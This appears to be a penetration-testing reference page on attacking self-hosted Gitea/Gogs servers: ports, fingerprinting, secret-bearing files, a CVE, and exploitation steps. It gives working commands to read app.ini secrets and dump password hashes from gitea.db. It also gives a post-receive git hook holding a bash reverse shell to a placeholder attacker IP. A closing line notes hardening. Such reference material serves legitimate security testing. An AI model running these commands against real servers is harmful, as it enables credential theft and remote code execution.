Gitea / Gogs
aka gogs
Self-hosted Git service (Gitea, and its parent Gogs) usually on 3000. Repos and the SQLite DB leak credentials and SECRET_KEY, and an admin can plant a server-side git hook for RCE as the service account.
Ports
| Port | Proto | Notes |
|---|---|---|
3000 | tcp | Gitea/Gogs web UI |
Fingerprint
- 'Powered by Gitea' / 'Gogs' footer, version in the page source
- /api/v1/version returns the exact version
Key files
| Path | Holds | Sensitive |
|---|---|---|
/data/gitea/conf/app.ini | DB creds, SECRET_KEY, INTERNAL_TOKEN, mailer creds | sensitive |
/data/gitea/gitea.db | SQLite: pbkdf2 user password hashes, tokens | sensitive |
custom/conf/app.ini | Gogs equivalent config | sensitive |
Default / weak creds
Check repos for hard-coded secrets and .git-credentials
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2022-30781 | Gitea: SSRF / git-fetch argument injection (older builds) |
Exploitation primitives
- Authenticated admin → add a server-side git hook (post-receive) that runs commands as the Gitea/git user on push
- Loot app.ini for SECRET_KEY + DB creds and gitea.db for crackable pbkdf2 hashes
- Search every repo's history for committed passwords, tokens and config
Overview
Gitea (a fork of Gogs) is a lightweight Git host on 3000. On a box it’s two things at once: a credential store (repos, the config and the SQLite DB all leak secrets) and an RCE primitive (git hooks).
Loot the config and DB
Pull the config — SECRET_KEY, INTERNAL_TOKEN, DB and mailer creds:
cat /data/gitea/conf/app.iniDump user hashes from the SQLite DB:
sqlite3 gitea.db "select name,passwd,salt from user;"RCE via git hooks
As an admin (or any user with hook rights), edit a repo’s Git Hooks → post-receive in the UI and add:
#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1Then push any commit to the repo — the hook fires as the Gitea/git service account.
Hardening
Keep Gitea patched, disable hook editing for non-admins, protect app.ini/gitea.db, and never commit secrets to repos.